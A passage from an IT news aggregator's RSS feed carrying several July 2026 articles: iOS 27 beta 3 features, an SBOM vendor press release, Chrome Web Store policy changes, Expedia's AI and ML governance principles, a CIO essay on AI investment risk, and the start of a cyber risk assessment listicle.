<description><![CDATA[Apple has released iOS 27 beta 3 for developers, bringing another round of refinements as the company continues testing its next major iPhone software update. The new beta focuses on Siri, Apple Intelligence, Shortcuts, Accessibility, Control Center, and several interface improvements while fixin...]]></description>
<link>https://tsecurity.de/de/3650459/ios-mac-os/ios-27-beta-3-here-are-all-the-new-features-apple-added/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3650459/ios-mac-os/ios-27-beta-3-here-are-all-the-new-features-apple-added/</guid>
<pubDate>Tue, 07 Jul 2026 06:08:51 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Apple has released iOS 27 beta 3 for developers, bringing another round of refinements as the company continues testing its next major iPhone software update. The new beta focuses on Siri, Apple Intelligence, Shortcuts, Accessibility, Control Center, and several interface improvements while fixing and polishing features introduced in earlier builds.



Developers can download iOS 27 beta 3 now, while Apple is expected to release the first public beta later this month. The final version of iOS 27 is scheduled to arrive this September alongside the next iPhone lineup.



Table of contentsHow to InstallEverything New in iOS 27 Beta 3Siri gets more customizationNew Live Recognition accessibility featureSafari introduces four new featuresPhotos gains rating controlsShortcuts offers two creation modesControl Center shows network detailsReminders receives a refreshed iconWallpaper animation looks betterAirPods Adaptive Audio gets more controlHome app requirement becomes clearerMaps improves route settingsLock Screen icons change appearanceBetter app icon appearancemacOS receives new wallpaperswatchOS adds Siri AIApple Intelligence downloads again5G+ support arrives in IndiaDevice CompatibilityFinal Thoughts



How to Install



If your Apple ID is enrolled in the Apple Developer Program, you can install the latest beta by following these steps:




Open Settings.



Tap General.



Select Software Update.



Open Beta Updates.



Choose iOS 27 Developer Beta.



Download and install the update.




Apple still recommends installing developer betas only on a secondary device because early software builds often include bugs, battery drain, app compatibility issues, and unexpected performance problems.



Everything New in iOS 27 Beta 3



Siri gets more customization







Apple has finally enabled Siri voice customization on supported devices. Users can now adjust both Pace and Expressivity, making Siri sound faster, slower, or more expressive based on personal preference.



This feature currently requires compatible Apple Intelligence hardware because voice processing happens directly on the device.



Apple also updated several Siri-related interfaces. The Settings app now displays Optimizing Search and Siri while indexing, and Camera's new Siri Mode also requires the updated Siri experience before becoming available.



New Live Recognition accessibility feature







Apple added a new Live Recognition section inside Accessibility settings.



The feature uses on-device intelligence together with the camera to identify objects, describe surroundings, answer questions about what it sees, and support custom activities. It expands Apple's accessibility tools while keeping processing on the device.



Safari introduces four new features



The first time users open Safari after updating, Apple highlights four new capabilities:




Automatically organize tabs



Browse bookmarks by topic



Receive page updates with Notify Me



Create custom extensions




These additions continue Apple's effort to make Safari more intelligent and easier to manage.



Photos gains rating controls



The Photos section inside Settings now includes a Show Rating Controls option.



When enabled, users can add star ratings to photos and videos while also displaying rating badges directly on thumbnails for quicker organization.



Shortcuts offers two creation modes



Creating a new shortcut now gives users a choice between opening the new natural language interface or launching directly into the traditional manual editor.



This makes Shortcuts more flexible for both beginners and experienced users.



Control Center shows network details







Control Center now displays your cellular signal strength and network type even while your iPhone remains connected to Wi-Fi.



You can quickly see whether your device is connected to LTE, 5G, or another cellular network without leaving Control Center.



Reminders receives a refreshed icon







Apple has redesigned the Reminders app icon with Liquid Glass styling.



The updated design replaces the previous solid colored bullets with hollow colored circles, giving the icon a cleaner appearance that better matches the rest of iOS 27.



Wallpaper animation looks better



When you pull down Notification Center, the subject from your wallpaper now appears above the Home Screen or the app you are currently using, creating a smoother layered effect.



AirPods Adaptive Audio gets more control



Users can now adjust the Adaptive Audio experience with a new slider that lets them choose between greater transparency or stronger noise cancellation.



Home app requirement becomes clearer



Apple now explains that Apple Intelligence features inside the Home app require an active 2TB iCloud+ subscription.



Maps improves route settings



Maps now includes a helpful tooltip that explains where route preferences are located, making it easier to find options when planning directions.



Lock Screen icons change appearance



The Lock Screen shortcuts for Control Center now use black icons instead of white icons on certain wallpapers, improving visibility.



Better app icon appearance



Apple softened the specular highlights used on app icons, making clear and tinted icons appear smoother throughout the system.



macOS receives new wallpapers



Alongside iOS 27 beta 3, Apple also added new Golden Gate Bridge wallpapers and screen savers in macOS 27.



watchOS adds Siri AI



watchOS 27 beta 3 introduces Siri AI support along with a standalone Siri app on supported Apple Watch models.



Apple Intelligence downloads again



Some users reported that installing beta 3 forces Apple Intelligence assets to download again, temporarily resetting access to the updated Siri experience until installation finishes.



5G+ support arrives in India



Apple has enabled 5G+ branding in India for supported mobile carriers, allowing compatible iPhones to display the upgraded network indicator where available.



Device Compatibility



iOS 27 supports:




iPhone 11 and newer



iPhone SE (2nd generation) and newer




Apple Intelligence and the latest Siri features require newer supported hardware, so not every iPhone running iOS 27 will receive every feature.



Final Thoughts



iOS 27 beta 3 focuses on refining features Apple introduced earlier instead of adding major surprises. Siri customization finally works, Accessibility gains a powerful Live Recognition feature, Photos and Shortcuts become more flexible, and several smaller interface improvements make the overall experience feel more polished.



Apple will continue testing iOS 27 throughout the summer before releasing the public beta in July and the stable update for all supported iPhones this September.]]></content:encoded>
</item>
<item>
<title><![CDATA[Insignary Closes SBOM Accuracy Gap With Binary-Level Clarity for Regulatory Risk]]></title>
<description><![CDATA[Most software composition analysis tools read what developers declare. Insignary Clarity’s patented binary-first platform analyzes what is actually built, shipped, and deployed — including the open-source components that never appear in any manifest.



Insignary, Inc., whose patented binary fing...]]></description>
<link>https://tsecurity.de/de/3650453/it-security-nachrichten/insignary-closes-sbom-accuracy-gap-with-binary-level-clarity-for-regulatory-risk/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3650453/it-security-nachrichten/insignary-closes-sbom-accuracy-gap-with-binary-level-clarity-for-regulatory-risk/</guid>
<pubDate>Tue, 07 Jul 2026 06:07:46 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p><strong>Most software composition analysis tools read what developers declare. Insignary Clarity’s patented binary-first platform analyzes what is actually built, shipped, and deployed — including the open-source components that never appear in any manifest.</strong></p>



<p><a href="https://insignary.com/" target="_blank" rel="noreferrer noopener">Insignary, Inc.</a>, whose patented binary fingerprint technology has been cited in four Gartner research reports, today announced its recognition as a Sample Vendor for Reachability Analysis in the <a href="https://www.gartner.com/doc/reprints?id=1-2NII8O1Z&amp;ct=260610&amp;st=sb&amp;utm_source=cybernewswire&amp;utm_medium=pr&amp;utm_campaign=pr1-gartner-hype-cycle-2026&amp;utm_content=release1" target="_blank" rel="noreferrer noopener">Gartner Hype Cycle for Secure Software Engineering, 2026</a>.</p>



<p>According to Gartner: “Open-source and third-party components may contain a long list of vulnerabilities, but not all of them directly impact your code base. Reachability analysis helps in triaging the vulnerabilities based on their exploitability.”<strong>*1</strong></p>



<p>The urgency is clear across independent industry research. A 2024 Venafi survey of 800 security decision-makers across the U.S., U.K., Germany, and France found that 92% are concerned about AI-generated code, and 63% have considered banning it outright over security risk.<strong>*2 </strong>The U.S. National Vulnerability Database recorded more than 48,000 CVEs in 2025 — roughly 130 every day.</p>



<p>AI coding assistants are accelerating the growth of unmanaged open-source dependencies. As organizations adopt these tools at scale, they face a widening challenge: understanding which open-source components enter production software, whether those components can be trusted, and how the resulting security and compliance risks are managed.</p>



<p>The problem is structural. Most SCA tools read what developers declare — not what actually runs. AI-generated code, vendor libraries, and third-party binaries frequently bypass package managers and never appear in a manifest.</p>



<p>“SBOMs are increasingly becoming a regulatory requirement around the world. However, software transparency is only as reliable as the accuracy of an SBOM itself. You cannot verify an SBOM by reading the manifest that created it. You verify an SBOM by examining the software that was actually built, shipped, and deployed. As software supply-chain regulations increasingly depend on SBOMs, the ability to validate software at the binary level becomes essential for organizations operating in regulated industries, critical infrastructure, and AI-enabled software environments.” — <strong>Taek Wan Kim, President &amp; CEO, Insignary</strong></p>



<p><strong>INSIGNARY CLARITY: BINARY-FIRST. AI-AWARE.</strong></p>



<p>Insignary Clarity scans both source and binary to build a complete Software Bill of Materials (SBOM) for the applications teams build, the third-party components they incorporate, and the IT infrastructure that bypasses the traditional secure development lifecycle.</p>



<p>Key capabilities include:</p>



<ul class="wp-block-list">
<li>Binary SCA — identifies open-source components, vulnerabilities, and license obligations directly from compiled binaries, without requiring source code or package manifests</li>



<li>AIBOM Generation — produces an AI Bill of Materials for software containing AI-generated or AI-assisted code, covering components that bypass traditional dependency declarations</li>



<li>Reachability Analysis — determines which disclosed vulnerabilities actually reach executable code paths, enabling risk-based prioritization rather than raw CVE-count triage</li>



<li>Continuous Vulnerability Alerting — monitors stored SBOMs against updated vulnerability databases and delivers automated alerts when newly disclosed CVEs match deployed components, without requiring a rescan</li>
</ul>



<p>“An SBOM is foundational to managing the complexity and securability of modern software deployments.”<strong>*3</strong></p>



<p><strong>RECOGNITION IN FOUR GARTNER REPORTS</strong></p>



<p>Insignary has been cited in four Gartner research reports*, Gartner Hype Cycle for Secure Software Engineering,2026, Gartner Hype Cycle for Application Security,2025, Gartner Scale Application Security With AI-Augmented Vulnerability Remediation,2025, and Gartner 3 Steps for Assessing an Open-Source Software Project, 2025.</p>



<p><strong>SUPPORTING GLOBAL SOFTWARE SUPPLY CHAIN REQUIREMENTS</strong></p>



<p>Insignary Clarity supports organisations meeting software supply-chain security requirements across North America and globally:</p>



<ul class="wp-block-list">
<li>U.S. Executive Order 14028 and OMB Memorandum M-26-05 — federal agencies may now independently verify vendor SBOMs rather than accepting a standard attestation form, raising the bar for all software sold into the U.S. government</li>



<li>FDA Section 524B — every connected medical device premarket submission must include a binary-verified SBOM covering all compiled software components</li>



<li>Canada’s Bill C-8 Critical Cyber Systems Protection Act (CCSPA), effective June 2026 — mandatory supply chain risk management for banking, telecommunications, energy, and transportation operators</li>
</ul>



<p>Additional frameworks: CISA and NSA SBOM guidance, NIST SSDF, Australia’s Information Security Manual (ISM), U.S. Connected Vehicle Rule, EU Cyber Resilience Act.</p>



<p><strong>TRUSTED BY GOVERNMENTS AND GLOBAL ENTERPRISES</strong></p>



<p>Globally, BearingPoint — one of Europe’s leading management and technology consulting firms and a strategic investor in Insignary — serves as the company’s exclusive distributor across Europe. Cybertrust Japan, another strategic investor, and its reselling partner TechMatrix drive adoption across Japanese manufacturing under a joint SBOM initiative. Customers include government organizations and global leaders across the electronics, defense, financial services, automotive, manufacturing, medical, and other technology sectors.</p>



<p>GARTNER and Hype Cycle are trademarks of Gartner, Inc. and/or its affiliates. Gartner does not endorse any vendor, product or service depicted in its research publications, and does not advise technology users to select only those vendors with the highest ratings or other designation. Gartner research publications consist of the opinions of Gartner’s research organization and should not be construed as statements of fact. Gartner disclaims all warranties, expressed or implied, with respect to this research, including any warranties of merchantability or fitness for a particular purpose.</p>



<p><strong>ABOUT INSIGNARY</strong></p>



<p>Insignary Inc. is a Toronto-based cybersecurity company specializing in binary composition analysis and software supply chain security. Its patented technology enables organizations to identify open-source software components, vulnerabilities, and software provenance directly from compiled binaries without requiring access to source code.</p>



<p>The company’s flagship platform, Insignary Clarity, provides binary analysis and software composition analysis capabilities that enable organizations to verify the contents of deployed software and strengthen software supply chain governance. Insignary Clarity AIR extends this capability to the AI domain by helping organizations identify, assess, and manage risks associated with AI models, AI-generated software, and AI-driven development environments.</p>



<p>The company serves enterprises, governments, and software vendors worldwide and is supported by strategic investors and partners including BearingPoint in Europe, Cybertrust Japan and TechMatrix in Japan, and TMA Solutions. Through its global partner ecosystem, Insignary supports software supply chain security initiatives across North America, Europe, and Asia.</p>



<p><strong>Website:</strong> <a href="https://insignary.com/" target="_blank" rel="noreferrer noopener">https://insignary.com/</a></p>



<p><strong>Full report:</strong> <a href="https://www.gartner.com/doc/reprints?id=1-2NII8O1Z&amp;ct=260610&amp;st=sb&amp;utm_source=cybernewswire&amp;utm_medium=pr&amp;utm_campaign=pr1-gartner-hype-cycle-2026&amp;utm_content=release1" target="_blank" rel="noreferrer noopener">Gartner Hype Cycle for Secure Software Engineering, 2026</a></p>



<p><strong>References:</strong></p>



<ol class="wp-block-list">
<li>Gartner, Hype Cycle for Secure Software Engineering 2026</li>



<li>Venafi, “Machine Identity Management Development Survey,” 2024</li>



<li>Gartner, “Emerging Tech: A Software Bill of Materials Is Critical to Software Supply Chain Management.”</li>
</ol>



<h5 class="wp-block-heading"><strong>Contact</strong></h5>



<p><strong>Principal Solutions Architect</strong></p>



<p><strong>Jessica DY Lee</strong></p>



<p><strong>Insignary</strong></p>



<p><strong>jessicalee@insignary.com</strong></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Google Chrome extensions must meet new privacy standards by August 1]]></title>
<description><![CDATA[Google has announced a set of Chrome Web Store policy changes that tighten rules around extension data collection, improve transparency requirements, and prohibit new categories of software. The updated Developer Program Policies will take effect on August 1, 2026, giving extension developers one...]]></description>
<link>https://tsecurity.de/de/3649729/it-security-nachrichten/google-chrome-extensions-must-meet-new-privacy-standards-by-august-1/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3649729/it-security-nachrichten/google-chrome-extensions-must-meet-new-privacy-standards-by-august-1/</guid>
<pubDate>Mon, 06 Jul 2026 21:38:04 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Google has announced a set of Chrome Web Store policy changes that tighten rules around extension data collection, improve transparency requirements, and prohibit new categories of software. The updated Developer Program Policies will take effect on August 1, 2026, giving extension developers one month to bring their products into compliance before enforcement begins. The most …</p>
<p>The post <a href="https://cyberinsider.com/google-chrome-extensions-must-meet-new-privacy-standards-by-august-1/">Google Chrome extensions must meet new privacy standards by August 1</a> appeared first on <a href="https://cyberinsider.com/">CyberInsider</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[What billions of AI predictions taught Expedia before the age of AI agents]]></title>
<description><![CDATA[There's an important distinction between AI that just works today, and AI that lasts at scale. Many companies optimize hard for the first one without ever asking whether they're building the second.Velocity without discipline and strategic direction is a liability, not an asset. The hardest part ...]]></description>
<link>https://tsecurity.de/de/3649313/it-nachrichten/what-billions-of-ai-predictions-taught-expedia-before-the-age-of-ai-agents/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3649313/it-nachrichten/what-billions-of-ai-predictions-taught-expedia-before-the-age-of-ai-agents/</guid>
<pubDate>Mon, 06 Jul 2026 18:20:29 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>There's an important distinction between AI that just works today, and AI that lasts at scale. Many companies optimize hard for the first one without ever asking whether they're building the second.</p><p>Velocity without discipline and strategic direction is a liability, not an asset. The hardest part of building AI at scale isn't getting a model to work once. It's building systems that continue to work, scale beyond individual teams and use cases, and improve consistently over time.</p><p>Today's AI systems do more than just predict and optimize. They converse, reason, and increasingly take action. An autonomous system making decisions on a traveler's behalf creates a very different set of expectations around reliability, governance, and accountability. As AI takes on more of those roles, the principles behind how these systems operate matter more than ever.</p><p>We have spent years applying AI and machine learning (ML) across the traveler journey — from personalization, ranking, and recommendations, to fraud prevention, customer support, and, more recently, generative and agentic AI experiences. That depth of experience is what led us to develop a set of ML and AI principles to guide how we build, deploy, and evolve AI systems across our company.</p><p>The goal is simple: Make sure the systems we build create real business value, scale, and operate safely. These principles define how we measure, design, govern, and operate our systems.</p><h2><b>From principles to practice</b></h2><p>Publishing principles is the easy part. The harder and more important work is turning them into operating mechanisms: Recommendations, requirements, tooling, and release processes that teams actually use. </p><p>We have begun using 'Agentic Release' tollgates: A set of recommended and, in some cases, required checks before launching agentic AI features. These tollgates translate principles like clear ownership, risk-based governance, evaluation, safe rollout, and monitoring into concrete expectations for teams. </p><p>Some of these recommendations and requirements are already being automated and integrated into the software development lifecycle (SDLC). Over time, the goal is for these expectations to become embedded in how we design, evaluate, approve, launch, and monitor AI systems from the start.</p><h2><b>Outcomes: Measuring what actually matters</b></h2><p>The first test for any model is whether it improves a business outcome and, ultimately, the traveler experience — not whether it just improves a technical metric. </p><ol><li><p><b>Align models to metrics with business impact: </b>Every ML effort must tie directly to a key business outcome or traveler experience metric. Technical optimizations are useful midpoints, not end goals<b>.</b></p></li><li><p><b>Optimize for return on cost</b>: The value a model creates has to justify what it costs to develop, train, and monitor, plus the operational complexity it adds. Favor solutions that deliver lasting impact relative to what they cost to run.</p></li><li><p><b>Justify complexity against strong baselines: </b>Complexity should be earned, not assumed. Start with a strong baseline: An existing general model, a simple heuristic, an off-the-shelf solution. Reach for specialized models or more complex architectures only when simpler options genuinely can't meet the bar.</p></li><li><p><b>Require both offline and online evaluation</b>: No model goes to broad deployment on offline validation alone or jumps straight to A/B testing. Every model must perform in both offline and online evaluations. Over time, our offline evaluations should reliably predict what we see online.</p></li></ol><h2><b>Design: building systems that scale beyond the teams that build them</b></h2><p>Getting a model to work is one challenge. Making its value extend beyond a single team or use case is the harder one.</p><ol><li><p><b>Build on shared foundations; specialize only when justified:</b> Favor shared, platform-wide foundations for core capabilities, data representations, and model building blocks. Specialization should build on those foundations, not spin up isolated stacks, so when the foundation improves, the gains flow across the organization.</p></li><li><p><b>Treat data as a first-class product</b>: A model's quality is bounded by the quality of its data. We need to maintain robust pipelines, clear lineage, reproducibility, and reusable features built with documented ownership, clear schemas, and SLAs that other teams can rely on.</p></li><li><p><b>Prioritize generality over local optimization</b>: When two approaches perform similarly, favor the one whose learnings, assets, and operating patterns can be reused across teams, brands, and use cases. We should optimize not just for local performance, but for how quickly improvements can diffuse across the company and compound over time. </p></li><li><p><b>Minimize and sunset manual business rules: </b>Manual rules are sometimes necessary for policy, safety, or compliance, but they should be explicit and reviewed regularly, never silent patches for weak models or a source of permanent maintenance debt.</p></li><li><p><b>Reproducibility and traceability by default</b>: Training data, features, configurations, evaluation results, deployment versions, and key decisions should all be documented and recoverable. That's what lets you debug a production issue months later and hand off ownership without losing institutional knowledge.</p></li></ol><h2><b>Trust: ownership, governance, and operating responsibly at scale</b></h2><p>The bar for deploying AI isn't just "does it work?" It's "can we stand behind it?" Trust isn't something you add at the end; it's earned over time and maintained across the full lifecycle of every model we ship.</p><ol><li><p><b>Assign clear ownership and accountability:</b> Every model needs defined ownership across its lifecycle — a business owner, a product owner, an AI owner, and an operational owner. These don't need to be four people, but the responsibilities must be explicit. Who's accountable for outcomes? Who responds if the model drifts? Who answers the incident at 2 a.m.? Without this in place, models become orphaned and problems surface with no one to own them.</p></li><li><p><b>Adhere to standards and governance:</b> AI and ML models must use approved platforms and comply with established company standards, release gates, and governance processes. Operating outside these guardrails requires a clear, defined path to remediation or deprecation, rather than an open-ended exception. </p></li><li><p><b>Govern proportionally to risk</b>: The level of review, evaluation rigor, and human oversight should scale with a model's impact. A customer-facing model that affects pricing or availability for millions of travelers demands a far higher bar than an internal tool used by a small team. For high-impact, safety-sensitive, or highly autonomous systems, human-in-the-loop checkpoints are built in from the start. </p></li><li><p><b>Design for fairness, privacy, and transparency</b>: We actively test for unintended bias, have strong data guardrails, and favor explainability when decisions meaningfully affect users. These are incorporated from the start, not added on.</p></li><li><p><b>Design for safe rollout, rollback, and control</b>: Deployments are progressive, with rollback paths, fallback mechanisms, and circuit breakers ready before launch. The ability to safely undo a deployment matters as much as the ability to ship it.</p></li><li><p><b>Monitor continuously and adapt:</b> Once live, teams must actively monitor quality, drift, latency, cost, and business performance and retrain or recalibrate when the data shifts. A team should always be able to explain how its model is performing now, not just how it performed when it launched.</p></li></ol><p>These principles do more than define how we build. They define what we're willing to ship and how we stand behind it. In a world where AI systems are increasingly consequential and make real decisions for real travelers and partners, these standards matter. Applied consistently, they build responsible AI that lasts.</p><p><i>Xavi Amatriain is Chief AI and Data Officer at Expedia Group</i></p><p><i>Xavier will share more details about Expedia's architecture during his session at </i><a href="https://venturebeat.com/vbtransform2026/agenda"><i>VB Transform</i></a><i> on July 14 at 11:10 am PT. He will discuss: "Expedia's blueprint for building autonomous agents for high-stakes transactional systems." </i></p><p><i>Interested in attending VB Transform 2026? Register </i><a href="https://web.cvent.com/event/27401f5a-f49e-46fc-90a3-eee31c2a4818/register"><i><u>here</u></i></a><i>. A select number of complimentary passes are also available to senior technology leaders. </i><a href="mailto:events@venturebeat.com"><i><u>Contact us </u></i></a><i>to get yours.</i></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Playing to win at the AI casino]]></title>
<description><![CDATA[Most executives approach AI cautiously, like people trying to stretch one bankroll across an entire night on the casino floor. They spread their chips, hedge every move, celebrate the occasional small win, and tell themselves they played wisely because they didn’t lose much. It feels disciplined ...]]></description>
<link>https://tsecurity.de/de/3648396/it-security-nachrichten/playing-to-win-at-the-ai-casino/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3648396/it-security-nachrichten/playing-to-win-at-the-ai-casino/</guid>
<pubDate>Mon, 06 Jul 2026 12:08:17 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Most executives approach AI cautiously, like people trying to stretch one bankroll across an entire night on the casino floor. They spread their chips, hedge every move, celebrate the occasional small win, and tell themselves they played wisely because they didn’t lose much. It feels disciplined and responsible. But in a market shifting this quickly, it can become managed irrelevance.</p>



<p>The real question is how to win so decisively that the house starts treating you differently, says Nimesh Mehta. As EVP and chief information and strategy officer at National Life Group, one of the nation’s largest life insurers, Mehta sees AI less as a controlled <a href="https://www.cio.com/article/4021841/lighting-the-first-flame-how-to-spark-a-transformation-that-sticks.html">technology program</a> and more as a sequence of bets that reveal how leadership thinks about risk, conviction, and competitive advantage. In his view, the organizations that pull ahead are the ones willing to place smarter, more consequential bets that reshape how the business operates, competes, and grows.</p>



<h2 class="wp-block-heading">Stop insuring every move</h2>



<p>Mehta’s framing exposes a trap many leadership teams still don’t recognize. A surprising number of organizations believe they’re being strategic with AI when they’re <a href="https://www.cio.com/article/4093961/discount-your-ai-roi-because-mileage-always-varies.html">actually over-insuring every decision</a>. They hedge every initiative, over-govern every experiment, over-analyze every downside, and under-commit to anything that might actually matter.</p>



<p>As a result, they reduce the upside to the point of insignificance. Mehta argues that many companies insure the bet so thoroughly that even when they win, the upside is negligible and moves are designed to eliminate discomfort, not win.</p>



<p>That’s what makes the casino analogy useful. In a casino, sitting on your chips can feel safe. In business, that same instinct creates drift. Markets move, competitors learn, and capabilities compound whether you’re ready or not. “Sometimes not betting can, in itself, become a losing strategy,” says Mehta, <a href="https://www.cio.com/article/4106578/2026-the-year-of-scale-or-fail-in-enterprise-ai.html">which strikes the heart of the moment facing CIOs</a>. Waiting may feel like discipline in the short term, but over time it becomes a tax on relevance. The organizations creating separation are those that understand uncertainty, contain it, and move anyway.</p>



<h2 class="wp-block-heading">Trade certainty for probability</h2>



<p>The deeper leadership shift Mehta is calling for is about changing the mental model from deterministic thinking to probabilistic thinking. Most enterprises still want AI to behave like a traditional technology investment. If we spend X, we should get Y. If the model isn’t fully accurate, it’s not ready, and if meaningful risk remains, deployment should wait. That logic made sense in a world built on structured systems and predictable workflows. But it becomes far less useful in a world where advantage comes from learning faster than rivals and improving in motion.</p>



<p>Most organizations still treat AI decisions like fixed equations rather than probabilistic plays, says Mehta. That distinction matters because it changes the questions leaders ask. A deterministic mindset looks at a customer service use case and asks whether the model is accurate enough to be trusted in every case. A probabilistic mindset asks whether the model can handle enough interactions well enough to free human judgment for the moments that matter most. A deterministic leader wants guaranteed ROI before scaling copilots. A probabilistic leader sees that modest improvements, repeated across marketing, operations, distribution, and service, can produce a compounding advantage long before any single use case looks perfect on paper. In that sense, imperfection may be leverage.</p>



<p>Nobody goes to a casino expecting certainty. The energy comes from reading the table, understanding the odds, and knowing that context changes the right move. AI operates in much the same way. “Leaders don’t need to become reckless gamblers,” says Mehta, “They need to become more fluent in uncertainty, more comfortable making directional decisions, and more disciplined about learning from each hand they play.”</p>



<h2 class="wp-block-heading"><a></a>When you’re holding 17</h2>



<p>Mehta’s blackjack metaphor captures the exact moment <a href="https://www.cio.com/article/4027422/the-missing-backbone-behind-your-stalled-ai-strategy.html">where many enterprises stall.</a> With a 17, the dealer will ask if you want to hit or stand. It’s paralyzing, but it’s the position many CIOs are in with AI today. The use case works as it produces value, but it isn’t perfect. The organization can see the upside, but it can still see the gaps, too. So many leaders choose to stand. They wait for better accuracy, cleaner governance, stronger confidence, or a more complete business case. They tell themselves that holding is the responsible move.</p>



<p>“The real risk, however, isn’t the hit but standing still while the table evolves around you,” says Mehta. That line reframes what prudence means in an AI environment. Hitting means understanding the odds well enough to act, not being careless. It means asking what the downside of moving forward actually is, what guardrails are needed, and what the cost of waiting might be if others are learning faster.</p>



<p>The strongest leaders understand that a good but not perfect hand can still be the right time to lean in. They know that learning in production, within bounds, often reveals more than another quarter spent polishing the slide deck.</p>



<h2 class="wp-block-heading">Bet where the upside compounds</h2>



<p>How should CIOs decide where to place bigger bets? Mehta’s answer is to look for asymmetry, where the upside is meaningfully larger than the downside, where learning compounds even if the first outcome is imperfect, and where speed creates an advantage competitors can’t easily copy. Those are better to address than asking which use cases feel safest. Mehta also emphasizes proximity to the business, arguing that the closer an AI use case sits to revenue, customer experience, or core operations, the more valuable the learning becomes. That’s why some of the most important bets may initially feel uncomfortable. But they matter because they produce insight that isolated pilots never can.</p>



<p>This isn’t a call for indiscriminate betting, though. Discipline still matters, and not every initiative deserves to scale, and not every model belongs in production. Good leaders know when to leave the table, reallocate chips, and avoid the sunk-cost logic that keeps weaker organizations trapped in bad hands. At National Life, that means thinking about AI as a portfolio of bets — some exploratory ones, some scaled with intent, and all assessed not only on immediate return but on how they expand capabilities. Positioning the enterprise for its next move is an important lesson for CIOs. “The goal isn’t to win every hand, but build a system to place better bets over time,” says Mehta.</p>



<h2 class="wp-block-heading"><a></a>Lessons for CIOs playing to win</h2>



<p>For CIOs, the takeaway is clear. Stop defining success as the absence of loss and define it as the presence of disproportionate upside. Shift your decision model from deterministic certainty to probabilistic advantage. Build a portfolio of bets tied closely to the business with enough governance to manage risk, but not so much that governance becomes an excuse for inaction.</p>



<p>Know when to press on emerging momentum and walk away from bets that don’t compound value. Most of all, <a href="https://www.cio.com/article/4172478/why-relationships-are-the-hidden-infrastructure-of-ai-transformation.html">recognize that AI leadership</a> is about demonstrating you can read the table, understand the odds, and move with conviction before the rest of the market catches up, not just proving you can keep the lights on while experimenting at the edges.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[7 cyber risk assessment gotchas to avoid]]></title>
<description><![CDATA[A cyber risk assessment helps security teams identify, estimate, and prioritize potential threats and vulnerabilities to key enterprise digital and physical assets. Yet, despite its importance, many CISOs fall victim to several types of “gotchas” that prevent them from fully achieving their risk ...]]></description>
<link>https://tsecurity.de/de/3648003/it-security-nachrichten/7-cyber-risk-assessment-gotchas-to-avoid/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3648003/it-security-nachrichten/7-cyber-risk-assessment-gotchas-to-avoid/</guid>
<pubDate>Mon, 06 Jul 2026 09:07:23 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>A cyber risk assessment helps security teams identify, estimate, and prioritize potential threats and vulnerabilities to key enterprise digital and physical assets. Yet, despite its importance, many CISOs fall victim to several types of “gotchas” that prevent them from fully achieving their risk assessment goals.</p>



<p>An assessment should be an essential part of every organization’s overall cybersecurity strategy. The process helps security leaders understand risks to business objectives, evaluate the likelihood and impact of cyberattacks, and develop ways to mitigate the risks they uncover.</p>



<p>Here are the top seven mistakes security leaders should avoid to ensure risk assessment effectiveness.</p>



<h2 class="wp-block-heading">1. Going through the motions</h2>



<p>The biggest “gotcha” is treating cyber risk assessments as a preset checklist or control inventory instead of a decision tool tied to real business impact and threat scenarios, says Shirsendu Mondal, a cybersecurity researcher at the University of North Carolina.</p>



<p>“When assessments become all about checking boxes, they lose the ability to reflect how risk actually shows up in an environment,” he states. “The goal should be to inform decisions about where a business is truly exposed.”</p>



<p>Mondal assers that the best way to avoid the complacency trap is to take a context-driven approach. “Ask where the asset is, who can reach it, what data it touches, how important it is to operations, and what happens if it goes down,” he explains. “Risk should always be tied to business impact, not only technical findings.”</p>



<p>Mondal also recommends adding internal business leaders to security teams, including individuals in areas such as IT and operations, given that <a href="https://www.csoonline.com/article/4186984/6-security-leader-tips-for-mastering-business-risk.html">risk is more than a technical issue</a>.</p>



<h2 class="wp-block-heading">2. Sugarcoating results</h2>



<p>These are challenging times, so we must be honest with our stakeholders, says Pablo Riboldi, CISO at BairesDev, a nearshore software development firm.</p>



<p>“When results are discouraging, admit that the threat landscape has evolved much faster than the previous evaluation framework anticipated,” he says.</p>



<p>Instead of just handing over lists of vulnerabilities, you need to start presenting actual attack scenarios, Riboldi adds. “For example, by prioritizing the top three most critical business assets and conducting an in-depth assessment on them, you can show immediate value.”</p>



<h2 class="wp-block-heading">3. Falling short on the scope of your assessments</h2>



<p>CISOs often securitize document controls, check compliance boxes, and produce a risk register that claims everything looks absolutely fine, says Denis Calderone, CTO at cybersecurity services firm Suzu Labs. Yet nobody bothered to test whether those controls actually work or stopped to ask whether the scope of the assessment covered what really matters.</p>



